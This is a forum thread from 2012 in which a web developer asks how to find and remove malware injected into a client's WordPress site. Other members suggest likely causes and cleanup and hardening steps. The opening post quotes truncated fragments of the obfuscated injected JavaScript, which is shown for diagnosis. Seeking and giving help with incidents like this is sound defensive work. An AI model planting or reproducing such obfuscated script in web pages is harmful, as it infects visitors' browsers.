SitePoint Sponsor

User Tag List

Results 1 to 7 of 7
  1. #1
    Web Enthusiast
    Join Date
    Jul 2000
    Location
    Western Massachusetts, USA
    Posts
    1,389
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Malware on wordpress site

    Twice now within one month Google Webmaster Tools has reported malware on my client's site www.beverlyhaberman.com. The first time I completely removed and re-loaded all the files. This time I'd like to get to the root cause of the malware.

    1) What is the source of this infection?
    2) How can I prevent this from happening again?
    3) Is there some way I can get rid of the infection short of removing and re-installing the files again?

    Here are the malware details according to Google Webmaster Tools.

    Last checked: April 5, 2012

    Suspected injected code at
    URL: http://beverlyhaberman.com/

    Code:
    <script>c=3-1;i=c-2;if(window.document)if(parseInt("0"+"123"
    )===83)try{new String("asd").prototype.q}catch(egewgsd){f=['
    -31i-31i65i62i-8i0i60i71i59i77i69i61i70i76i6i63i61i76i29i68i
    ......
    Suspected injected code at
    URL: http://beverlyhaberman.com/workplace-productivity/


    Code:
    <script>c=3-1;i=c-2;if(window.document)if(parseInt("0"+"123"
    )===83)try{new String("asd").prototype.q}catch(egewgsd){f=['
    -31i-31i65i62i-8i0i60i71i59i77i69i61i70i76i6i63i61i76i29i68i
    ......
    Suspected injected code at
    URL: http://beverlyhaberman.com/workplace-productivity/the-energy-of-yes

    Code:
    <script>c=3-1;i=c-2;if(window.document)if(parseInt("0"+"123"
    )===83)try{new String("asd").prototype.q}catch(egewgsd){f=['
    -31i-31i65i62i-8i0i60i71i59i77i69i61i70i76i6i63i61i76i29i68i
    ......
    Last edited by Mittineague; Apr 6, 2012 at 12:48. Reason: less mal code
    Paul C.
    ClickBasics
    http://www.clickbasics.com

  2. #2
    Community Advisor silver trophy

    Join Date
    Nov 2006
    Location
    UK
    Posts
    2,551
    Mentioned
    40 Post(s)
    Tagged
    1 Thread(s)
    Could be any number of reasons, most of which have been discussed in depth here before (try a search for 'hacked' 'virus' or similar)

    - out of date wordpress install
    - out of date plugin
    - insecure plugin
    - using a free template downloaded from a secondary source
    - file permissions set insecurely
    - ftp hijacked by virus
    - insecure shared hosting

    As to which one it is, this is a process of elimination. If you're on shared hosting you're less likely to get to the bottom of it, as you probably won't have access to the logs necessary to examine what's happened in detail.

  3. #3
    SitePoint Zealot
    Join Date
    Oct 2008
    Posts
    140
    Mentioned
    4 Post(s)
    Tagged
    0 Thread(s)
    check out this wordpress article on sitepoint
    http://www.sitepoint.com/10-wordpress-security-tips/

    Plus check into your wordpress hosting company. Lots of hosting companies allow wordpress to be installed, but have you are responsible for ....

  4. #4
    SitePoint Member
    Join Date
    Apr 2012
    Location
    Memphis, TN
    Posts
    2
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    The iframe and malware is really beside the point

    Something is putting that line of code at the top of your pages - probably the index.php file(s). But more important - that "something" will keep putting the hack code back unless you do a complete clearing out as recommended in the referenced articles.

    Instead of trying to locate source of the recurrence, just wipe the site, re-install Wordpress + plugins and harden the site as mentioned.

    Cheers,
    Let me know how it goes.

  5. #5
    Web Enthusiast
    Join Date
    Jul 2000
    Location
    Western Massachusetts, USA
    Posts
    1,389
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    When you mean completely wipe out the site, do you mean the database as well, or just the files?
    Paul C.
    ClickBasics
    http://www.clickbasics.com

  6. #6
    Programming Team silver trophybronze trophy
    Mittineague's Avatar
    Join Date
    Jul 2005
    Location
    West Springfield, Massachusetts
    Posts
    17,173
    Mentioned
    190 Post(s)
    Tagged
    2 Thread(s)
    Don't just wipe it - save a backup of your database or you'll lose your posts and comments.

    Then virus scan it. And if you can't get new plugins and the theme your using scan those too.

    Scan your own machine, change passwords, install a fresh most recent version of WordPress etc. etc. The codex has a good page "Hardening WordPress" if I remember correctly.

  7. #7
    SitePoint Member
    Join Date
    Apr 2012
    Posts
    3
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Keep backup data always. Other thing is to remove this injected code from all php files. i guess php files have this script injection. The main thing is secure password. Frequently, change your passwords and have strong one.


Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •